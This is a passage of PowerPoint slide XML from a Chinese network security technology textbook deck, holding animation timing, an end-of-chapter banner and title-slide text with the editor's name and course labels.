                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
